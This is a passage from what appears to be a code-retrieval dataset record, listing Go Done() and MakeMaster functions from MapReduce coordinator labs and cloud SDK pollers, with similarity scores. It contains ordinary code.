m.mu.Unlock()\n\tfor _, val := range m.RTasks {\n\t\tif val.status == IDLE || val.status == RUNNING {\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}", "func (op *RunJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (m *Master) Done() bool {\n\tret := false\n\tfor _, worker := range m.WorkerMap {\n\t\t// ping to worker\n\t\t_, err := rpc.DialHTTP(\"tcp\", worker.Host + fmt.Sprintf(\":%d\", worker.Port))\n\t\tif err != nil {\n\t\t\tm.mu.Lock()\n\t\t\tdelete(m.WorkerMap, worker.ID)\n\t\t\tm.mu.Unlock()\n\n\t\t\tlog.Printf(\"worker %s died!\\n\", worker.ID)\n\t\t\tlog.Println(\"re-assign task to other worker\")\n\t\t\tif m.NumMapperCompleted < len (m.MapperTask) {\n\t\t\t\tfor _, mTask := range m.MapperTask {\n\t\t\t\t\tif mTask.WorkerID == worker.ID {\n\t\t\t\t\t\tmTask.Status = Idle\n\t\t\t\t\t\tm.mu.Lock()\n\t\t\t\t\t\tm.MapperTask[mTask.ID] = mTask\n\t\t\t\t\t\tm.mu.Unlock()\n\t\t\t\t\t\tlog.Println(\"mapper task hold by worker has released. Task ID: \", mTask.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif m.NumReduceCompleted < len (m.ReducerTask) {\n\t\t\t\tfor _, rTask := range m.ReducerTask {\n\t\t\t\t\tif rTask.WorkerID == worker.ID {\n\t\t\t\t\t\trTask.Status = Idle\n\t\t\t\t\t\tm.mu.Lock()\n\t\t\t\t\t\tm.ReducerTask[int(rTask.ID)] = rTask\n\t\t\t\t\t\tm.mu.Unlock()\n\t\t\t\t\t\tlog.Println(\"reducer task hold by worker has released. Task ID: \", rTask.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"worker %s is running \\n\", worker.ID)\n\t\t}\n\t}\n\t// tasks completed\n\tif m.NumReduceCompleted == m.NReduce {\n\t\tret = true\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tm.RWMutexLock.Lock()\n\tdefer m.RWMutexLock.Unlock()\n\tret := m.reduceFinished\n\treturn ret\n}", "func (op *StopReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (m *Master) haveDone() bool {\n\tret := true\n\tt := time.Now().Unix()\n\tj := 0\n\tfor j < len(m.reduceTasks) {\n\t\tif m.reduceTasks[j].state == 1 {\n\t\t\tif t-m.reduceTasks[j].emittime >= TIMEOUT {\n\t\t\t\tm.reduceTasks[j].state = 0\n\t\t\t}\n\t\t}\n\t\tj++\n\t}\n\ti := 0\n\tfor _, reduceTask := range m.reduceTasks {\n\t\tif reduceTask.state == 0 {\n\t\t\tm.nextreducetask = i\n\t\t\tbreak\n\t\t}\n\t\ti++\n\t}\n\tfor _, reduceTask := range m.reduceTasks {\n\t\tif reduceTask.state != 2 {\n\t\t\tret = false\n\t\t\tbreak\n\t\t}\n\t}\n\tif ret {\n\t\tm.done = true\n\t}\n\treturn ret\n}", "func (op *RunReportJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (m *Master) Done() bool {\n\tret := false\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\tret = m.haveDone()\n\treturn ret\n}", "func (m *Master) Done() bool {\n\tm.lock.Lock()\n\tdefer m.lock.Unlock()\n\treturn m.mapDone && m.reduceDone\n}", "func (m *Master) Done() bool {\n\n\tif !m.isAllMapCompleted() {\n\t\tm.Mux.Lock()\n\t\tfor i := 0; i < m.M; i += 1 {\n\t\t\tif m.IsIdleMaps[i] == 1 {\n\t\t\t\tif time.Now().Unix() - m.MapTasksTime[i] > TIMEOUT {\n\t\t\t\t\tm.IsIdleMaps[i] = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tm.Mux.Unlock()\n\t} else {\n\t\tm.Mux.Lock()\n\t\tfor i := 0; i < m.R; i += 1 {\n\t\t\tif m.IsIdleReduces[i] == 1 {\n\t\t\t\tif time.Now().Unix() - m.ReduceTasksTime[i] > TIMEOUT {\n\t\t\t\t\tm.IsIdleReduces[i] = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tm.Mux.Unlock()\n\t}\n\n\tfor i := 0; i < m.R; i += 1 {\n\t\tif m.IsIdleReduces[i] != 2 {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}", "func (m *Master) Done() bool {\n\tm.accessLock.Lock()\n\tdefer m.accessLock.Unlock()\n\tret := len(m.completedReduces) == m.nReduce\n\treturn ret\n}", "func (p *ManagedClustersStopPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code here.\n\tif m.M.ToDo <= 0 && m.R.ToDo <= 0 {\n\t\tret = true\n\t}\n\n\treturn ret\n}", "func (op *DeleteJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *ManagedClustersRunCommandPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *UpdateJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *DeploymentsStartJFRPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *ManagedClustersStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *SQLResourcesRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsStopPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *NotebookWorkspacesStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *CreateJobOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (j *Job) done() { j.isDone <- true }", "func (tg *TimeoutGroup) Done() {\n\tif left := tg.jobsLeft.Dec(); left == 0 {\n\t\tif posted := tg.postedFin.Swap(1); posted == 0 {\n\t\t\ttg.fin <- struct{}{}\n\t\t}\n\t} else if left < 0 {\n\t\tAssertMsg(false, fmt.Sprintf(\"jobs left is below zero: %d\", left))\n\t}\n}", "func (p *DeploymentsRestartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (tg *TimeoutGroup) Done() {\n\tif left := atomic.AddInt32(&tg.jobsLeft, -1); left == 0 {\n\t\tif posted := atomic.SwapInt32(&tg.postedFin, 1); posted == 0 {\n\t\t\ttg.fin <- struct{}{}\n\t\t}\n\t} else if left < 0 {\n\t\tAssertMsg(false, fmt.Sprintf(\"jobs left is below zero: %d\", left))\n\t}\n}", "func (c *Coordinator) Done() bool {\n\tc.jobLock.Lock()\n\tdefer c.jobLock.Unlock()\n\n\treturn c.phase == CoordinatorPhaseDone\n}", "func (c *Coordinator) Done() bool {\n\treturn c.MapAllDone && c.ReduceAllDone\n}", "func (p *NotebookWorkspacesClientStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *ServicesStopPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *SQLResourcesClientRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *DeleteTensorboardRunOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (c *Coordinator) Done() bool {\n\treturn c.isDone.Load().(bool)\n}", "func (p *MongoDBResourcesRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *RunPipelineOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *NotebookWorkspacesDeletePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DatabaseAccountsOfflineRegionPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (s *JobStatus) Done() bool {\n\treturn s.State == Done\n}", "func (s *JobStatus) Done() bool {\n\treturn s.State == Done\n}", "func (p *SQLResourcesDeleteSQLContainerPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *MongoDBResourcesClientRetrieveContinuousBackupInformationPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersInvokeCommandPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsClientWhatIfPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (cs cmdStatus) isDone() bool {\n\treturn cs&(1<<12 /*busy*/) == 0\n}", "func (op *DeleteReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *LiveEventsStopPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DatabaseAccountsClientOfflineRegionPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (mdb *memdbSlice) checkAllWorkersDone() bool {\n\n\t//if there are mutations in the cmdCh, workers are\n\t//not yet done\n\tif mdb.getCmdsCount() > 0 {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (p *ManagedClustersDeletePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *DeploymentsStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *UpdateReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *CustomDomainsUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *ManagedClustersUpdateTagsPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraDataCentersUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *NotebookWorkspacesClientDeletePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *DeleteTensorboardTimeSeriesOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (op *DeleteTensorboardExperimentOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *ManagedClustersResetAADProfilePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersDeallocatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (w *Watcher) isDone() bool {\n\tvar done bool\n\tselect {\n\tcase done = <-w.done:\n\t\tw.finish()\n\tdefault:\n\t}\n\treturn done\n}", "func (p *DeploymentsGenerateThreadDumpPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (c *Coordinator) Done() bool {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\treturn c.done\n}", "func Done() bool {\n\tdoneMu.Lock()\n\tdefer doneMu.Unlock()\n\n\treturn done\n}", "func (p *ServicesStartPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (op *ResumeReplicationOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *SQLResourcesDeleteSQLTriggerPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *SQLResourcesClientDeleteSQLContainerPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (c *Coordinator) Done() bool {\n\tc.mapLock.Lock()\n\tc.reduceLock.Lock()\n\tret := c.mapDoneTasks == len(c.mapTasks) &&\n\t\tc.reduceDoneTasks == len(c.reduceTasks)\n\tc.reduceLock.Unlock()\n\tc.mapLock.Unlock()\n\treturn ret\n}", "func (op *DeleteStoragePoolOperation) Done() bool {\n\treturn op.lro.Done()\n}", "func (p *CassandraDataCentersDeletePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *ConfigServersValidatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersDeletePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *SQLResourcesCreateUpdateSQLContainerPoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *CassandraClustersCreateUpdatePoller) Done() bool {\n\treturn p.pt.Done()\n}", "func (p *SQLResourcesDeleteSQLDatabasePoller) Done() bool {\n\treturn p.pt.Done()\n}" ]
[ "0.7996627", "0.7941394", "0.7888764", "0.77940726", "0.77649367", "0.77086526", "0.76372457", "0.76169884", "0.7613166", "0.7599608", "0.7595551", "0.7579391", "0.7575501", "0.75663006", "0.7555578", "0.75244766", "0.74878955", "0.74781144", "0.7467091", "0.7411585", "0.740517", "0.7384948", "0.73584414", "0.7340744", "0.731873", "0.72804284", "0.7194897", "0.7186251", "0.71646714", "0.7105918", "0.7100921", "0.7081491", "0.707998", "0.706307", "0.70399994", "0.7021367", "0.70044714", "0.6920961", "0.68253815", "0.6716729", "0.6707865", "0.6704038", "0.66970265", "0.66929007", "0.6688764", "0.6681234", "0.6658311", "0.6657078", "0.664532", "0.66420203", "0.6614845", "0.6599931", "0.65944815", "0.65895724", "0.654594", "0.65379536", "0.6516665", "0.6500256", "0.64982927", "0.64922434", "0.64608467", "0.645971", "0.64451563", "0.64451563", "0.6444511", "0.6428746", "0.64164466", "0.6414201", "0.64076346", "0.6401408", "0.63985246", "0.63953716", "0.63828075", "0.6382394", "0.6360633", "0.6355789", "0.63512117", "0.63489604", "0.6346684", "0.6345903", "0.63418293", "0.63395005", "0.6336757", "0.6336312", "0.6330235", "0.6321877", "0.63212496", "0.6321226", "0.6314806", "0.6295898", "0.6294869", "0.6294485", "0.6293573", "0.6283357", "0.62825435", "0.6276497", "0.627224", "0.6266495", "0.62658083", "0.6262956" ]
0.77588177
5
MakeMaster as the name create a Master. main/mrmaster.go calls this function. nReduce is the number of reduce tasks to use.
func MakeMaster(files []string, nReduce int) *Master { m := Master{} m.files = files m.record = map[string]*record{} m.tasks = map[int][]*record{} m.reduceTasks = map[int]*record{} m.nReduce = nReduce m.phase = TaskMapType // Your code here. m.server() return &m }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func MakeMaster(files []string, nReduce int) *Master {\n\tfmt.Printf(\"Making Master. nReduce = %d\\n\", nReduce)\n\n\tm := Master{}\n\tm.nReduce = nReduce\n\tm.mapDone = false\n\tm.reduceDone = false\n\n\t// Create map tasks from files\n\tfor i, filename := range files {\n\t\tfmt.Printf(\"Creating task for file %v\\n\", filename)\n\t\ttask := MapTask{}\n\t\ttask.num = i\n\t\ttask.filename = filename\n\t\ttask.state = Idle\n\t\tm.mapTasks = append(m.mapTasks, task)\n\t}\n\n\t// Create reduce tasks from param\n\ti := 0\n\tfor i < nReduce {\n\t\ttask := ReduceTask{}\n\t\ttask.num = i\n\t\ttask.state = Idle\n\t\tm.reduceTasks = append(m.reduceTasks, task)\n\t\ti += 1\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t// TODO: figure out better place to setup log flags\n\tlog.SetFlags(log.Ltime) // | log.Lshortfile)\n\n\tm := Master{nReduce: nReduce}\n\n\t// Your code here.\n\t// Generating Map tasks\n\tlogger.Debug(\"Generating Map tasks...\")\n\tfor i, fn := range files { // M map tasks\n\t\tm.taskCount++\n\t\ttaskId := fmt.Sprintf(\"map-task-%d\", i)\n\t\ttaskInfo := TaskInfo{taskId, IDLE, \"\", fn, \"\", -1}\n\t\tm.TaskSummary.Store(taskId, taskInfo)\n\t}\n\t// Generating Reduce tasks\n\tlogger.Debug(\"Generating Reduce tasks...\")\n\tfor i := 0; i < nReduce; i++ { // R reduce tasks\n\t\tm.taskCount++\n\t\ttaskId := fmt.Sprintf(\"reduce-task-%d\", i)\n\t\ttaskInfo := TaskInfo{taskId,IDLE, \"\", \"\", \"\", -1}\n\t\tm.TaskSummary.Store(taskId, taskInfo)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\t//record each file as a task\n\tmapTasks := []MapTask{}\n\tj := 0\n\tfor _, filename := range files {\n\t\tmapTasks = append(mapTasks, MapTask{filename, j, 0, 0})\n\t\tj++\n\t}\n\tm.mapTasks = mapTasks\n\tm.nextmaptask = 0\n\t//generate nReduce reduce tasks each in an intermediate file\n\treduceTasks := []ReduceTask{}\n\ti := 0\n\tfor i < nReduce {\n\t\treduceTasks = append(reduceTasks, ReduceTask{INTERPREFIX + strconv.Itoa(i), i, 0, 0})\n\t\ti++\n\t}\n\tm.reduceTasks = reduceTasks\n\tm.nextreducetask = 0\n\tm.nReduce = nReduce\n\tm.done = false\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\tm.M = len(files)\n\tm.R = nReduce\n\n\tm.MapTasks = files\n\tm.IsIdleMaps = make([]int, m.M)\n\n\tm.ReduceTasks = make([][]string, m.R)\n\tm.IsIdleReduces = make([]int, m.R)\n\n\n\tm.MapTasksTime = make([]int64, m.M)\n\tm.ReduceTasksTime = make([]int64, m.R)\n\n\tfor i := 0; i < m.R; i += 1 {\n\t\tm.ReduceTasks[i] = make([]string, m.M)\n\t\tfor j := 0; j < m.M; j += 1 {\n\t\t\tname := \"mr-\" + strconv.Itoa(j) + \"-\" + strconv.Itoa(i)\n\t\t\tm.ReduceTasks[i][j] = name\n\t\t}\n\t}\n\n\n\t// Your code here.\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t// Your code here.\n\tm := Master{\n\t\tmutex: sync.Mutex{},\n\t\tstate: Initializing,\n\t\tmapTasks: []Task{},\n\t\treduceTasks: []Task{},\n\t\tnumOfMap: len(files),\n\t\tnumOfReduce: nReduce,\n\t}\n\n\tfor i, file := range files {\n\t\tm.mapTasks = append(m.mapTasks, Task{\n\t\t\tId: i,\n\t\t\tTaskType: MapTask,\n\t\t\tState: UnScheduled,\n\t\t\tFilename: file,\n\t\t\tNumsOfMap: m.numOfMap,\n\t\t\tNumsOfReduce: m.numOfReduce,\n\t\t})\n\t}\n\n\tfor i := 0; i < nReduce; i ++ {\n\t\tm.reduceTasks = append(m.reduceTasks, Task{\n\t\t\tId: i,\n\t\t\tTaskType: ReduceTask,\n\t\t\tState: UnScheduled,\n\t\t\tFilename: \"\",\n\t\t\tNumsOfMap: m.numOfMap,\n\t\t\tNumsOfReduce: m.numOfReduce,\n\t\t})\n\t}\n\n\tm.state = MapPhase\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.M = &MapTasks{\n\t\tTaskQueue: []*MapTask{},\n\t\tTaskQueuePtr: 0,\n\t\tToDo : 0,\n\t\tMu: sync.Mutex{},\n\t}\n\n\tm.R = &ReduceTasks{\n\t\tTaskQueue: []*ReduceTask{},\n\t\tTaskQueuePtr: 0,\n\t\tToDo : 0,\n\t\tMu: sync.Mutex{},\n\t}\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.R.TaskQueue = append(\n\t\t\tm.R.TaskQueue,\n\t\t\t&ReduceTask{FilePaths: make(map[string]bool)})\n\t}\n\n\tfor _, file := range files {\n\t\tm.M.TaskQueue = append(m.M.TaskQueue, &MapTask{\n\t\t\tFilePath: file,\n\t\t\tState: ToStart,\n\t\t})\n\t\tm.M.ToDo++\n\t}\n\n\tm.R.ToDo = nReduce\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tm.nMap = len(files)\n\tm.ReduceOutNum = nReduce\n\tm.nReduce = 0\n\t// Your code here.\n\t// init task\n\tm.mapTasks = make([]Task, 0)\n\tm.reduceTasks = make([]Task, 0)\n\tm.reduceTaskFileLists = make([][]string, m.ReduceOutNum)\n\tm.hasGenerateReduceTasks = false\n\tinitMapTaskNum := len(files)\n\tfor i := 0; i < initMapTaskNum; i++ {\n\t\tm.mapTasks = append(m.mapTasks, Task{Id: i, State: GENERATED, TaskKind: MAPTASK, MapTaskFile: files[i]})\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mu = sync.Mutex{}\n\tm.nReduce = nReduce\n\tm.files = files\n\t\n\tif nReduce > len(files) {\n\t\tm.taskCh = make(chan Task, nReduce)\n\t} else {\n\t\tm.taskCh = make(chan Task, len(m.files))\n\t}\n\n\tm.initMapTasks()\n\tgo m.tickSchedule()\n\n\tm.server()\n\tdisplay(\"master init...\")\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t// Your code here.\n\tfileCount := len(files)\n\tmapTasks := make([]mapTask, len(files))\n\treduceTasks := make([]reduceTask, nReduce)\n\tfor i := 0; i < fileCount; i++ {\n\t\tmapTasks[i] = mapTask{\n\t\t\tfile: files[i],\n\t\t\ttaskID: i,\n\t\t\tstate: taskUnstarted,\n\t\t}\n\t}\n\tfor i := 0; i < nReduce; i++ {\n\t\treduceTasks[i] = reduceTask{\n\t\t\ttaskID: i,\n\t\t\tstate: taskUnstarted,\n\t\t}\n\t}\n\tm := Master{\n\t\tmapTasks: mapTasks,\n\t\treduceTasks: reduceTasks,\n\t\tnReduce: nReduce,\n\t}\n\tcleanIntermediateFiles()\n\tgo m.retryTaskLoop()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\t//os.RemoveAll(Dir)\n\tm := Master{}\n\tm.files = files\n\tm.isFinished_ = false\n\tm.completedMapCount = -1\n\tm.completeReduceCount = -1\n\tm.mutex = sync.Mutex{}\n\t//init mapTask\n\tif len(files) != 8 {\n\t\tos.Exit(-1)\n\t}\n\tfor index, _ := range files {\n\t\ttask := Task{MAP,false,false,index}\n\t\tm.mapTasks = append(m.mapTasks,task)\n\t}\n\tfmt.Printf(\"init files %v \\n\",len(files))\n\tfor i := 0; i < nReduce; i++ {\n\t\ttask := Task{REDUCE,false,false,i}\n\t\tm.reduceTasks = append(m.reduceTasks, task)\n\t}\n\t//os.Mkdir(Dir,os.ModePerm)\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{nReducers: nReduce, MTasks: Tasks{}, RTasks: Tasks{}, WStatus: make(map[int]string), IntermediateFiles: make(map[int][]string)}\n\n\tfor idx, file := range files {\n\t\tif idx == 0 {\n\t\t\tm.MapTaskNumber = idx\n\t\t}\n\t\tm.MTasks[file] = &TaskInfo{status: IDLE, StartTs: -1, EndTs: -1}\n\t}\n\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.RTasks[i] = &TaskInfo{status: IDLE, StartTs: -1, EndTs: -1}\n\t}\n\tm.StartTaskMonitor()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tMnum: len(files),\n\t\tRnum: nReduce,\n\t\tJobManager: &JobManager{\n\t\t\tCounter: 0,\n\t\t\tJobs: make(chan *Job, len(files)),\n\t\t\tRShuffleChan: make(chan string, len(files)), // TODO: 是否可以优化\n\t\t\tJobsMonitor: make(map[uint64]*Job),\n\t\t},\n\t\tWorkerManager: &WorkerManager{\n\t\t\tCounter: 0,\n\t\t},\n\t}\n\n\tfor _, f := range files {\n\t\tjob := &Job{\n\t\t\tType: 0,\n\t\t\tId: atomic.AddUint64(&m.JobManager.Counter, 1),\n\t\t\tRNum: nReduce,\n\t\t\tSource: f,\n\t\t}\n\t\tm.JobManager.Jobs <- job\n\t}\n\n\tgo m.ShuffleReduceJobs()\n\tgo m.MonitorJobs()\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.mapTasks = files\n\tm.reduceTasks = nReduce\n\tm.status = MapStage\n\tm.reduceFinished = 0\n\tm.mapFinished = 0\n\tm.mapInProgress = make(map[int]void)\n\tm.reduceInProgress = make(map[int]void)\n\tfor i := 0; i < len(files); i++ {\n\t\tm.mapNotAssigned.PushBack(i)\n\t}\n\tfor i := 0; i < nReduce; i++ {\n\t\tm.reduceNotAssigned.PushBack(i)\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.init()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tm.inputFiles = files\n\tm.nReduceTasks = nReduce\n\tm.init()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tNMap: len(files),\n\t\tNReduce: nReduce,\n\t\tfiles: files,\n\t\tMapTask: make(map[int]*TaskInfo),\n\t\tReduceTask: make(map[int]*TaskInfo),\n\t\tDoneMapTask: []int{},\n\t\tDoneReduceTask: []int{},\n\t\tExitChan: make(chan int),\n\t}\n\t// Your code here.\n\tfor idx, _ := range files {\n\t\tm.TodoMapTask = append(m.TodoMapTask, idx)\n\t}\n\tfor idx := 0; idx < nReduce; idx++ {\n\t\tm.TodoReduceTask = append(m.TodoReduceTask, idx)\n\t}\n\tgo m.countTime()\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tlog.SetFlags(log.Ltime | log.Lshortfile)\n\n\tm := Master{}\n\tm.initMapTask(files, nReduce)\n\tm.server()\n\tgo m.CheckTimeout()\n\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tsources := make([][]string, len(files)+1) // 多出一行保存完成状态\n\tfor i := 0; i < len(sources); i++ {\n\t\tsources[i] = make([]string, nReduce)\n\t}\n\tm.taskPhase = MapPhase\n\tm.nextWorkerId = uint64(0)\n\tm.nReduce = nReduce\n\tm.nMap = len(files)\n\tm.status = make([]bool, nReduce)\n\tm.TaskPool = &TaskPool{Pool: make(chan *Task, len(files))}\n\t\n\tm.mapTasks = make([]Task, len(files))\n\tm.reduceTasks = make([]Task, nReduce)\n\n\tdispatcher = &Dispatcher{\n\t\tTimeOut: 10 * time.Second,\n\t\tM: &m,\n\t\tCleanWorkerChan: make(chan uint64, len(files)),\n\t\tReduceChan: \t\t make(chan uint64, nReduce),\n\t}\n\tdispatcher.run()\n\t// 初始化map任务\n\t\n\tfor num, file := range files {\n\t\tm.mapTasks[num] = Task{\n\t\t\tStatus: NotStarted,\n\t\t\tType: MapTask, // 0 map 任务 1 reduce 任务 2 shut down 3 retry\n\t\t\tConf: &TaskConf{File: []string{file}, TaskId: uint64(num)},\n\t\t}\n\t\tm.TaskPool.Pool <- &m.mapTasks[num]\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\r\n\tm := Master{}\r\n\r\n\t// Your code here.\r\n\tm.nextMapTaskNo = 1\r\n\tm.nextReduceTaskNo = 1\r\n\tm.inputFiles = make(chan string, 100)\r\n\tm.mapTasks = make(map[int]string)\r\n\tm.mapFinish = make(map[string]int)\r\n\tm.failedMapTaskNo = make(map[int]int)\r\n\tm.reduceTasks = make(map[int][]string)\r\n\tm.inputIntermediateFiles = make(chan []string, 100)\r\n\tm.done = make(chan bool)\r\n\tm.reduceFinish = make(map[int]bool)\r\n\tm.mapIntermediateFiles = make([][]string, 0)\r\n\tm.taskPhase = 0\r\n\tm.nReduce = nReduce\r\n\r\n\tfor _, file := range files {\r\n\t\tm.inputFiles <- file\r\n\t\tm.totalInputFiles++\r\n\t}\r\n\r\n\tm.server()\r\n\t// log.Println(\"-----Server Started------\")\r\n\treturn &m\r\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tnMap := len(files)\n\tm := NewMaster(files, max(nMap, nReduce), masterTimeout, nReduce)\n\n\t// Your code here.\n\tm.server()\n\treturn m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tdelete()\n\tm := Master {\n\t\tmu: sync.RWMutex{},\n\t\tM: len(files),\n\t\tR: nReduce,\n\t\tidleTasks: [2]chan Task{make(chan Task, len(files)), make(chan Task, nReduce)},\n\t\tinProgress: [2]map[Task]bool{make(map[Task]bool), make(map[Task]bool)},\n\t\tcompletedTasks: [2]chan Task{make(chan Task, len(files)), make(chan Task, nReduce)},\n\t}\n\n\n\t// Your code here.\n\tfor i, file := range files {\n\t\ttask := Task{Type: \"map\", Filename: file, TaskNum: i, NReduce: nReduce}\n\t\tm.idleTasks[0] <- task\n\t}\n\n\tfor i:=0; i<nReduce ; i++ {\n\t\tm.idleTasks[1] <- Task{\n\t\t\tType: \"reduce\",\n\t\t\tFilename: \"\",\n\t\t\tTaskNum: i,\n\t\t\tNReduce: nReduce,\n\t\t}\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.nReduce = nReduce\n\tm.files = files\n\tm.nMap = len(files)\n\tm.mapStates = make([]mapState, m.nMap)\n\tm.reduceStates = make([]reduceState, m.nReduce)\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\n\t// Your code here.\n\tm.ReduceTask = make(map[int]*ReduceTaskStatus)\n\tm.MapTask = make(map[int]*MapTaskStatus)\n\tm.inputFileList = files\n\tm.nReduce = nReduce\n\tm.State = Map\n\tfor i, _ := range files {\n\t\tm.MapTask[i] = &MapTaskStatus{\n\t\t\tStatus: UnInit,\n\t\t}\n\t}\n\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{}\n\tmaptasks = make(chan MapTask, len(files))\n\treducetasks = make(chan int, nReduce)\n\tm.mapTaskStatus = make(map[string]int, len(files))\n\tm.reduceTaskStatus = make(map[int]int, nReduce)\n\tfor index, file := range files {\n\t\tm.mapTaskStatus[file] = NotStarted\n\t\tmapTask := MapTask{}\n\t\tmapTask.index = index\n\t\tmapTask.filename = file\n\t\tmaptasks <- mapTask\n\t}\n\n\tm.inputFiles = files\n\tm.nReduce = nReduce\n\tm.intermediateFiles = make([][]string, nReduce)\n\tm.RWMutexLock = new(sync.RWMutex)\n\tm.server()\n\treturn &m\n}", "func MakeMaster(files []string, nReduce int) *Master {\n\tm := Master{\n\t\tinputFiles: files,\n\t\tnReduce: nReduce,\n\t\tallFiles: files,\n\t\tisMapCompleted: false,\n\n\t\ttoStartMaps: makeRange(0, 